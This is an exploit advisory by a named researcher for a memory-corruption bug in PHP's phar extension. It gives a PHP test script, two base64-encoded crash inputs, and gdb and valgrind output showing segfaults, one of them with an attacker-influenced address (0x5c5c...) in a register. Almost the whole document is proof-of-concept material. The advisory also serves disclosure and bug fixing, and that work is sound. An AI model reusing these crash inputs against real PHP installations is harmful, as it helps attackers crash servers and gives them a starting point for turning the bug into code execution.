# Exploit Title: Invalid memory write in phar on filename with \0 in name # Date: 2016-03-19 # Exploit Author: @vah_13 # Vendor Homepage: https://secure.php.net/ # Software Link: https://github.com/php/php-src # Version: 5.5.33 # Tested on: Linux Test script: --------------- cat test.php ------------------- <?php $testfile = file_get_contents($argv[1]); try { $phar = new Phar($testfile); $phar['index.php'] = '<?php echo "https://twitter.com/vah_13 ?>'; $phar['index.phps'] = '<?php echo "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; ?>'; $phar->setStub('<?php Phar::webPhar(); __HALT_COMPILER(); ?>'); } catch (Exception $e) { print $e; }?> ---------------------------------------------------------------------------------- PoC 1 root@TZDG001:/tmp/data2# base64 ret/crash13 CkTJu4AoZHKCxhC7KlDNp2g5Grx7JE092+gDAADJVR1EZS8vL/oAAPovLy8v5y8vLy9lZWVlZWVl DAwMC+MMDAwMDM4MDAwgBwwMDAwMDAxQDC8uLi8jLy88Ly8u+C8vLxERERERERERpXRDbnQgdGhh dCBtVnJrV3h4eHh4eNt4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4ePh4Ly8vLy8vLy8vLy8v Ly8vLy8vLy8vLy8vLkYvLy8vLy8vLy8vLy9kJy8vLy8vLy8vLy8v8+TzMZovLysvLy8vL3l5eXl5 eXl5eXkpIHsEAAYgICAveHh4eHh4eHh4eAF4AAJ4eP8vIExvYWQgY29tbWFuZChTgG5lIHV0aWxp dHkKICAgIGluY2yKZGUuLi4uLi4uLi4uPCYuLi4ucG1kLnBoYXIudmVKCiAgJCAvLyBSdegDIGxp bmUgTW50ZXJmYWxlCiAgIBxleGkAAP//SFBNRFxUZXh0VUl5Q29tbWFuZAAANwAAAHNyY1Rf/39N UElMRVIodjsgPz4MChAAAAANAgAAEP//+QEAAAAAAAAiAAAqAAAAlnJjL21haW4vlA8uLlEvci8u LhAA2GVzZXRzL2NsZWFucipeTUxSZW5kZXLJYEC2IQAAAABjb3JlrgAAAAAAI2OcwrYAAAAAAA0A NwAAAHMASRwAc2V0cy91bndzcmMAnjgjW7gwgAAAcmMAAgAAADN1bGVzZXRzL2MgAAAAb///f/9p YWwueG1s4BIAAB+u4VZzcmMvbWFpbi9yZXNvdXJpZ24ueABzcmMvbQA9dr2itiEASRyXl5eXl5eX l5etl5eXlwAMc3JjL21hW24v6Bvzb3VyY2VzL3J1//+AAHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0 dHR0dHR0WWV0cy9uYRwcMBwcHBwcHBwcAB+u4TSoCwD1A3lvdXJjZXMvdmVsb2Qxmi9LZ01yAB+u 4RgAACCu4VbjDy5nLnhtbP8vAC4uLjwmLnh4eHh4eHh4eHh4+HgZLy8vLi4ucG1kLnBoL3Jlc291 cmNjZXNzcgCAAAAuGnVzc3IvLg0AAHFF7BMAc3JjL/9haW4vcGhwL1BIUE1EL1BhcnMnJycnJycn 
JycnJycnJyfnAAAKQ5bxci5waHBtGAAAH67hGAAAH67hVuMPLi5RLy8vLy8vc3JW4QcAANevurC2 IQAAAAcAACwvdXNyLy4uL1KHAK78Vm4vcGhwL1BIUE1EL1JlbmRlcmVyKl5NTFJlbmRlcslgQLYh AAAAAAAAGwABAHNyYy9tYWluL3BoNy9QSFBNRC9SdVRlLnCAcDIYAAAfruEAAHNyYy9tYWluL3AA iy0AAABzcmMAAFeu4VYwCAAAPXa9oi8vLy8vLy8vLy8vLy8vLy8vL28v8+TzOoAAAGhwL1D/CzpE ZXZlbG9kMZovbmdNZXRob2QQcGiKlgwAIAAAAFb8BQAAI2OcwrYhAAAAACAANwAAAGNyYy9tYc7O zs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4AEa7hVnNyYy+A////L9YhzLYhAADg////MXBo cC9QSFBNRC9PdW1hf24vcGhwL1BIUGFEUFBQUFBQUFByYy9tYWluL3BocC9QSFBNRC9SdWxML0Rl c2lnZy9Ub29PYW55TWV0aG9kfy4fruFWYy9tYWluL3BocC9QSFBNRC9SdWxlL0Rlc2lnbi8vRGV2 ZWxvZFxlbnRDbwMAAGMvbQA9dr2itiEASRwAcG1kLnARruFWjwUF//8FcIWYAAIAAAAvLi4v//// /3JILi4vLi91c3IvLi4AADYAAABecmMvUEhQTUQvUnVsZS9EZXNpZ1svV2VpAGhwAAAAc3JjLy8v LwAAAQDk8zGaLy//L1J1bGUvRJCQkJBAkJCQkJDQkJBzkJCQkJCQkJCQkJCQkJCQkG50cm9w6HAu LgAAAQAuLi4uLi4uLi4uL1BIUE1EL091bWFpdi9waHAvUEhQTURlcgAEQ2hpbGRyZW4ucGhwbQsA AB+u4VZ+BQAAgLP4+7Yh3////wAOAAAfruxWbQYAADplbi4vdf//Ly4u5i4vdQBkHwAD6AAD6AAN ADcuLhAA2DUAAAAyAAAAc3JkLy8uLi8uL1Jzci4vdXNycGguUS8vLy9/AAAAL3Vzci+uQi8uL3Vz ci8vLi98c3IvLhciLi91c3IvLi4vdXOALy4uL/////9ldHMvYyAAAABv//9//2lhbC54tbW1tbW1 tbW1tbW1vABjL+ZJTnUgZC4vc5QPAAAEAHIvLi4vdXNyLy4uLy4vdXNyLy4AZC4vAQAAAC4uL3UQ AC8uLi8uL3Vzby4vdXNyDy4uUS8vLy8vL3NyLy4vc3IvLi4odXNyAAIAAC4vdXNzci8uLi91e3Iv rkIvLmRvci9hdRAA2DVXu7YhABcuL3Vzci8uAS8u (gdb) rtest.php ret/crash13 Starting program: /tmp/php-7.0.4/sapi/cli/php test.php ret/crash13 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 
zend_string_init (persistent=0, len=2, str=0x121a64c "->") at /tmp/php-7.0.4/Zend/zend_string.h:157 157 zend_string *ret = zend_string_alloc(len, persistent); (gdb) i r rax 0xae6572 11429234 rbx 0x7fffffffa880 140737488332928 rcx 0x64c 1612 rdx 0x2 2 rsi 0x3 3 rdi 0xae658a 11429258 rbp 0x2 0x2 rsp 0x7fffffffa7e0 0x7fffffffa7e0 r8 0xfffffffffffffffb -5 r9 0x1 1 r10 0x3 3 r11 0x1214fc0 18960320 r12 0x1206b7a 18901882 r13 0x4 4 r14 0x121a64c 18982476 r15 0x7fffffffa880 140737488332928 rip 0xd531b4 0xd531b4 <add_assoc_string_ex+116> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 ***************************************************************** PoC 2 root@dns:~/php-src# base64 ./bck_out/6648 Ly4vdXNyLy4uLy4vdXNy4uLi4uLi4uLi4uLi4uLi4uLi4uLit7e3t7dhI1VmbH8AIGdsb1Rh/39i b25ziGFudCB0AYCAIG1QX1CKRQAAgABFQVMsJywgJ3BoYXInKXNfLy4uLy4vU3NyLy4uL31zci8u LjwuL3Vzci8ubWFxUGhhciggJ3Bokm1kLnBoYXIAAAB/CgovL4iInoiIiIiIiIh1Li9//+ggQ29u ZmlndXJcB2lCY2x1ZC91c3IvLoiJiIiIiKKIiIiIXFxcXFxHXFxcXFxcXFxcXFxciA0uL3VzcmUg cC8uLi91c3IvLi4uL3MQLy4ULxEvgHNyNiBpbmNsdWQv9G8gdXNcIHRoaXMgcGhhctlzZXRfaW5j iYgmMSYmJiY4/e3t7WFyI2VmaW5lIGdsb1T/FhYWFhYWFhYWFhYWFhYWFhYWFhYWaGFyJyk7Co5k ZV9wYXRoKCkpOxYKaWYgKGlzjn+UKCRhcmV2KSAmJiByZWEvdXNyLy4QLy4vdXNyLy4uL31zci8u LjwuL3Vzci8u5i91c3IvLi4vLi91c3IuLj0ndXNyLy4uEADJci8uJi8uL3VzEC9AEhwuL3NyLy4u L3Vzci8uLi8uL2lziz4uLi8uL3Vzci8oLi91bmNsdWQvdVNyLy6IiIikiIiIcwAgLi5y3zouLy4v JiYmJlMmJiYmOBDt7e0= ./bck_out/6648 ==4103== Source and destination overlap in memcpy(0x6e5d800, 0x6e5d798, 291) ==4103==at 0x4C2D75D: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915) ==4103==by 0x6AD1B5: _estrdup (zend_alloc.c:2558) ==4103==by 0x6880FD: php_stream_display_wrapper_errors (streams.c:152) ==4103==by 0x68AE4B: _php_stream_opendir (streams.c:1994) ==4103==by 0x5E986A: spl_filesystem_dir_open (spl_directory.c:236) ==4103==by 0x5ED77F: spl_filesystem_object_construct (spl_directory.c:724) ==4103==by 0x6C1655: zend_call_function (zend_execute_API.c:878) ==4103==by 0x6EBF92: zend_call_method 
(zend_interfaces.c:103) ==4103==by 0x5A44A8: zim_Phar___construct (phar_object.c:1219) ==4103==by 0x75D143: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1027) ==4103==by 0x70CFBA: execute_ex (zend_vm_execute.h:423) ==4103==by 0x76D496: zend_execute (zend_vm_execute.h:467) ==4103== ==4103== Invalid read of size 8 ==4103==at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291) ==4103==by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362) ==4103==by 0x6ACEC3: _emalloc (zend_alloc.c:2446) ==4103==by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140) ==4103==by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163) ==4103==by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563) ==4103==by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667) ==4103==by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407) ==4103==by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384) ==4103==by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670) ==4103==by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213) ==4103==by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311) ==4103==by 0x429178: zend_throw_exception (zend_exceptions.c:877) ==4103==by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910) ==4103==by 0x42639C: php_error_cb (main.c:1041) ==4103==by 0x427F4B: zend_error (zend.c:1163) ==4103==by 0x426FFD: php_verror (main.c:897) ==4103==by 0x427306: php_error_docref1 (main.c:921) ==4103==Address 0x5c5c5c5c5c5c5c5c is not stack'd, malloc'd or (recently) free'd ==4103== ==4103== ==4103== Process terminating with default action of signal 11 (SIGSEGV) ==4103==General Protection Fault ==4103==at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291) ==4103==by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362) ==4103==by 0x6ACEC3: _emalloc (zend_alloc.c:2446) ==4103==by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140) ==4103==by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163) ==4103==by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563) ==4103==by 
0x6DC4E0: _zend_hash_str_update (zend_hash.c:667) ==4103==by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407) ==4103==by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384) ==4103==by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670) ==4103==by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213) ==4103==by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311) ==4103==by 0x429178: zend_throw_exception (zend_exceptions.c:877) ==4103==by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910) ==4103==by 0x42639C: php_error_cb (main.c:1041) ==4103==by 0x427F4B: zend_error (zend.c:1163) ==4103==by 0x426FFD: php_verror (main.c:897) ==4103==by 0x427306: php_error_docref1 (main.c:921) Segmentation fault Program received signal SIGSEGV, Segmentation fault. zend_mm_alloc_small (size=<optimized out>, bin_num=16, heap=0x7ffff6000040) at /root/php_bck/Zend/zend_alloc.c:1291 1291 heap->free_slot[bin_num] = p->next_free_slot; (gdb) i r rax 0x5c5c5c5c5c5c5c5c 6655295901103053916 rbx 0x8 8 rcx 0x10 16 rdx 0x7ffff60000c0 140737320583360 rsi 0x10 16 rdi 0x120 288 rbp 0x7ffff6000040 0x7ffff6000040 rsp 0x7fffffffa230 0x7fffffffa230 r8 0xf74460 16204896 r9 0x7ffff6013170 140737320661360 r10 0x0 0 r11 0x101 257 r12 0x7ffff605c658 140737320961624 r13 0x7ffff605c640 140737320961600 r14 0x7ffff60561f8 140737320935928 r15 0x8439b8 8665528 rip 0x6acec3 0x6acec3 <_emalloc+115> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 https://bugs.php.net/bug.php?id=71860 https://twitter.com/vah_13 https://twitter.com/ret5et |